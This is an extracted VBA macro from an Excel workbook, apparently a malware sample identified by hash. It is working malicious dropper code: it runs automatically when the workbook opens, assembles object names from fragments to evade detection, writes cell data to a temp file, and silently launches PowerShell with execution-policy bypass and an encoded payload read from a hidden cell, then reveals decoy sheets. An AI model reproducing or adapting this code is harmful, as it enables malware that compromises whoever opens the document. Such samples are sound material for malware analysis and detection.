Filename     : ./macros/0dc86ad65c90cfc84253c4d7605911aba93b599b1bbd422ce8f597f3ffd59009
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call F5615664
End Sub

Sub F5615664()
    On Error Resume Next
    A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
    I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
    Set U5777083 = CreateObject(A4660720)
    Set D6945409 = CreateObject(I6611623)
    W2151843 = U5777083.ExpandEnvironmentStrings("%temp%\U1848931.TMP")
    I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
    Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
    M9383463.WriteLine (I2622608)
    M9383463.Close
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
    K7517347 = "power" & "sh" & "ell" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
    V1380609 = K7517347 & U1808667
    U5777083.Run V1380609, 0
    ActiveWorkbook.Worksheets(2).Visible = True
    ActiveWorkbook.Worksheets(3).Visible = True
    ActiveWorkbook.Worksheets(2).Activate
    ActiveWorkbook.Worksheets(1).Visible = False
    ActiveWorkbook.Save
End Sub

